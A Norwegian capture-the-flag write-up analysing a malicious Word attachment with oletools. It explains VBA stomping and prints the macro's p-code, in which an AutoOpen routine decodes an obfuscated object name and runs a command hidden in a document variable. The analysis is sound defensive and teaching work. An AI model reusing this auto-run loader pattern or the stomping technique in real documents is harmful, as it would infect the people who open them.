## Writeup: Trampet

### Oppgavetekst og hint
![Brukeren begynner å bli irritert. Det er mange e-poster med vedlegg, men disse kan ikke åpnes. Det har kommet nok en e-post, og denne er videresendt til analysesentret. E-posten er sjekket og brukeren mener alt ser bra ut. Er det trygt å åpne vedlegget? OBS: Samme advarsel (og passord) som forrige oppgave. Lever EGG{32-byte hex}](imgs/trampet_1.png "Brukeren begynner å bli irritert. Det er mange e-poster med vedlegg, men disse kan ikke åpnes. Det har kommet nok en e-post, og denne er videresendt til analysesentret. E-posten er sjekket og brukeren mener alt ser bra ut. Er det trygt å åpne vedlegget? OBS: Samme advarsel (og passord) som forrige oppgave. Lever EGG{32-byte hex}")  
Etter to dager ble også hint for trampet lagt ut.  
![Hint: Se tilbake til Kraftskall - oppgavene er veldig like.](imgs/trampet_2.png "Hint: Se tilbake til Kraftskall - oppgavene er veldig like.")  

1. Kjører file for å sjekke filtype.
![Output of file commands shows that this a standard word document of the old file format](imgs/3_file.png "Output of file commands shows that this a standard word document of the old file format")
 Vi ser at dette er et composite document, samt noe metadata om hvem som har laget det, editert det sist osv. Det meste av denne metadataen er sannsynligvis forfalsket om dette er et faktisk maldoc. (spoiler: mesteparten er forfalsket)

2. Vi bruker deretter olevba fra [oletools](https://github.com/decalage2/oletools) for å sjekke etter macroer siden det har vært standard skadevarelevering i maldocs (som ikke er av typen RTF...) en god stund. Her brukes olevba med -a flagget for å bare dumpe ut analysen fra olevba.
 ![Resultat av olveba mot fil]( "Resultat av olveba mot fil")
 Som markert i screenshot melder olevba at den har oppdager tegn på [VBA-stomping](https://medium.com/walmartlabs/vba-stomping-advanced-maldoc-techniques-612c484ab278). Når et dokument med makroer bygges vil det lagres med makro-kildekoden (scriptet) lagret i skriptform, men det vil også kompilere skriptet til maskinkode basert på Office-versjonen dokumentet ble opprettet med, f.eks. Office 2013x64. 
 
 VBA-stomping er når man endrer på VBA-koden (for eksempel overskriver den med \x00 bytes, eller bytter den ut med VBA-kode som gjør ingenting knyttet til skadevare), men lar maskinkoden være der. Da vil maskinkoden fortsatt eksekvere om den åpnes på riktig Officeversjon, mens alle andre Officeversjoner vil forsøke å bygge sin egen maskinkode fra VBA-koden og eksekvere denne i stedet for maskinkoden som ligger i dokumentet.
 
 I tilfellet hvor denne er satt til \x00 vil VBA kompilere til ingenting. VBA-stomping fjerner også muligheten til å korrekt analysere makroer med verktøy som [Vipermonkey](https://github.com/decalage2/ViperMonkey) som p.t. ikke har støtte for emulering av pcode.

 Det finnes verktøy som [pcodedmp](https://github.com/bontchev/pcodedmp) som henter ut maskinkoden (pcode), men heldigvis for deltagere her har oletools akkurat fått (eksperimentell) pcodedmp støtte. 
 Mer informasjon og resurser om VBA-stomping [her](https://vbastomp.com/).
 
3. Vi kjører olevba på nytt, denne gangen med -c og --pcode for å ikke printe analysteteksten på slutten samt få med pcodeanalyse. (Merk at --pcode flagget gjør at pcode disassembly printes i tillegg til raw pcode. I praksis gir ikke disassembly mye.)

`P-CODE disassembly:`
``` 
 Processing file: Partial_Payment_5186.doc  
 ===============================================================================  
 Module streams:  
 Macros/VBA/ThisDocument - 1097 bytes  
 Macros/VBA/Module1 - 3960 bytes  
 Line #0:  
 	FuncDefn (Function PH_WW())   
 Line #1:   
 	Dim   
	VarDefn Y_ZA (As String)    	
 Line #2:  
 	LitStr 0x0027 "099127111126117124128058095116113120120"  
 	St Y_ZA     
 Line #3:  
	Dim   
	VarDefn S_AS (As Object)  
	BoS 0x0000  
	SetStmt  
	Ld Y_ZA  
	ArgsLd M_KZ 0x0001    
	Ld VBA  
	ArgsMemLd CreateObject 0x0001  
	Set S_AS   
 Line #4:  
	Dim   
	VarDefn Y_RF (As String)  
 Line #5:  
	LitStr 0x0048 "Z2B1L9I2J4B2Y1S6J9S4L7S3B5D1Z4A3E4D5O8Z4C3M7W8F2M8A5H8S6M5A9U5D6R7G1B3L7"  
	St Y_RF   
 Line #6:  
	Dim   
	VarDefn P_ZP (As String)  
 Line #7:  
	LitStr 0x0048 "L9B3B2W1L4Y4R6F8H6Q0E4X7K2K9X2X1P8O8J1Q1L1A3I2U6S6D4L9U6O1K5H3A9C5K0U4Y9"  
	St P_ZP   
 Line #8:  
	Dim    
	VarDefn RR_OO (As String)  
 Line #9:  
	LitStr 0x0048 "V5G3E1X2J1W2D0E9W8J1R9Q4E6Z3U5T9Z5Q0H0D7K8I0H1H7K0U6V6O4O4Q7B7Q4O8L3P0W8"  
	St RR_OO   
 Line #10:  
	Dim   
	VarDefn H_DJ (As String)   
 Line #11:  
	LitStr 0x0048 "E4I2Y4S2G7F4D2H6F2C9K7G1K0R5A1T5P0I2V1N4B1Y2U9K0D3Z5C2T8E5D4E6E7R7M6G6W1"  
	St H_DJ   
 Line #12:  
	Dim   
	VarDefn H_SO (As String)  
 Line #13:  
	LitStr 0x0048 "L3N4M0G5S0O5C6V1Z7T4T1H2R3V9Z7V3U4S7S0X0V1K2A6F8J3O2H8Y9D2F8X9X9B9A3W4U2"  
	St H_SO   
 Line #14:  
	Dim   
	VarDefn S_GP (As String)  
 Line #15:  
	LitStr 0x0048 "W4N7Q9I0W3Z9Z6V0J1L2T9E6X3R5D4C5U6P3D9T0M3L8M2O1V4S7K0Z6L0O3R7I3I5Q4Q7L6"  
	St S_GP   
 Line #16:  
	Dim   
	VarDefn E_KX (As String)  
 Line #17:  
	LitStr 0x0048 "W3S2H9A6D6C4D0U8G3Z5M7G1B3J9D4H8S7C2M7C4D0X2G3B2H0A4C1L1I3S4Q5S9L9Z3F2C0"  
	St E_KX   
 Line #18:  
	Dim   
	VarDefn L_NY (As String)  
 Line #19:  
	LitStr 0x0048 "M1T9Y3X9V1G5A8F7U7A3M3Y0V1M4I9O3R0N7L0E0E8A4N2U6D6A8P4H0H6R5Q9I9Q2B5O8X3"  
	St L_NY   
 Line #20:  
	Dim   
	VarDefn N_BY (As String)  
 Line #21:  
	LitStr 0x0048 "U7D6H1U0E9U9H5E3G3J2O3I6Q0M6O2H4J3S2D6K5V4A0W3B3O0A8N0S2H2V6T0R4X1M1Y7U4"  
	St N_BY   
 Line #22:  
 Line #23:  
	LitStr 0x0004 "V_VK"  
	Ld ActiveDocument   
	ArgsMemLd Variables 0x0001   
	ArgsLd M_KZ 0x0001   
	Ld S_AS   
	ArgsMemCall Exec 0x0001   
 Line #24:  
	EndFunc   
 Line #25:  
 Line #26:  
	FuncDefn (Sub AutoOpen())  
 Line #27:  
	LitStr 0x0005 "PH_WW"  
	Ld Application   
	ArgsMemCall Run 0x0001   
 Line #28:  
 Line #29:  
	EndSub   
 Line #30:  
 Line #31:  
	FuncDefn (Public Function M_KZ(ByVal P_TU As String))  
 Line #32:  
 Line #33:  
	StartForVariable   
	Ld L_NK   
	EndForVariable   
	LitDI2 0x0001   
	Ld P_TU   
	FnLen   
	LitDI2 0x0003   
	ForStep   
 Line #34:  
	Ld P_TU   
	Ld L_NK   
	LitDI2 0x0003   
	ArgsLd Mid 0x0003   
	St P_ZM   
 Line #35:  
	Ld C_FW   
	Ld P_ZM   
	FnInt   
	LitDI2 0x000C   
	Sub   
	ArgsLd Chr 0x0001  
	Add   
	St C_FW   
 Line #36:  
	StartForVariable   
	Next   
 Line #37:  
 Line #38:  
	Ld C_FW   
	St M_KZ   
 Line #39:  
 Line #40:  
 	EndFunc   
 Line #41:  
 Line #42:  
```

4. Her kan man se at koden ligner veldig på makrokoden på forrige maldoc. I linje 2 defineres en strengen Y_ZA som ligner på J_NC fra forrige oppgave. Da kan vi isåfall forvente at 
     * Det er definert en variabel i Tabel1 med variabelnavn V_VK
     * Vi kan finne en funksjonen M_KZ som brukes for å dekode payloaden. Vi ser at fra ´Line #31:´ har vi definert en `for` loop som kjører en `sub` operasjon med `0x000c`. Da har vi det vi trenger for å dekode.  
 Cat av Tabel1 gir:
 ![Vi finner variabel V_VK i tabell 1](imgs/3_table1.png "Vi finner variabel V_VK i tabell 1")

5. Vi kjører dette gjennom samme dekoder som i `kraftskall`, men trekker fra 12 (0x0c). Dette gir oss:
 ![Dekoded payload](imgs/2020-04-20_20-40.png "Dekoded payload")

NB: EGG dukker opp tre ganger i payload. De tre EGGene er helt identiske.
